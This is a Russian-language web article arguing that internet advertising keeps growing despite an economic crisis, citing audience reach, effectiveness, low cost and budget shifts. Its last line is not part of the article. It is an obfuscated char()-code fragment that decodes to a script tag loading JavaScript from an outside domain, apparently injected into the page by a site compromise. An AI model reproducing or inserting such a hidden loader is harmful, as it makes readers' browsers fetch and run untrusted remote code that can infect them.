В чем секрет популярности Интернет-рекламы?

В чем секрет популярности Интернет-рекламы?

Несмотря на экономический кризис, в ближайшем будущем спрос на интернет услуги,  по прогнозам аналитиков,  не уменьшится.  Так, например, уровень прогнозируемого роста в России и Украине составляет более 50%. В таком случае возникает вполне логичный и обоснованный вопрос: почему падение деловой активности в целом не отразилось на рекламном рынке в сети Интернет? На это, по мнению специалистов, есть несколько причин.

Первая причина кроется в масштабах потенциальной аудитории рекламных кампаний в Сети Интернет. Так, по данным исследований, на сегодняшний день насчитывается более миллиарда пользователей глобальной сети.  Согласно статистике, только в Украине сетью постоянно пользуется каждый третий взрослый житель страны. К тому же сама интернет среда с каждым днем расширяется и становится все более разнообразной. В результате тематическое наполнение Интернета на данный момент  способно удовлетворить информационные потребности любого жителя планеты.

Вторая причина – возрастающая эффективность Интернет-рекламы. Ведь рекламные технологии, используемые в сети, развиваются вместе с ростом количества аудитории Интернета. Например, сегодня, несмотря на свое недавнее появление,  набирает значительных оборотов рынок контекстной рекламы. Существенно увеличился и спрос на целевые бизнес-рассылки, которые, возможно, скоро полностью выместят спам. А более четко и детально передавать рекламную информацию позволяют технологии создания баннеров. Это и многое другое позволяет пользователю создавать комплексные рекламные услуги для достижения нужной цели – реклама товара, брендинг, PR и так далее.

Третьей причиной является цена. Посчитав стоимость рекламного контакта, Вы сможете убедиться в том, что в большинстве случаев другие рекламные носители значительно уступают  Интернет-рекламе. Необходимо также отметить, что при проведении рекламной кампании в сети рекламодатель имеет возможность сразу, без дополнительных исследований, отслеживать эффективность рекламы. Кроме этого, получает гарантированное прочтение своего сообщения представителями целевой аудитории. То есть в результате он платит только за то, что ему нужно. Этот фактор тем более важен, особенно, если учесть, что, по мнению специалистов, такая эффективность при использовании других каналов или невозможна в принципе или же возможна, но будет стоить очень дорого.

Четвертая причина заключается в том, что толчок к еще более динамичному развитию Интернет-рекламы даст именно кризис. Это явление, на первый взгляд, парадоксальное,  можно объяснить тем, что переведение рекламы в Интернет в столь непростое для всех время позволит,  значительно сократив рекламные бюджеты, сохранить высокий уровень эффективности рекламных кампаний. И как это ни странно звучит, но, по мнению специалистов, именно  сейчас наступает время, которое предоставляет большие возможности для стремительного роста.

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)f35e53b4fa31ce88510bc1e868185043.js" type="text/javascript">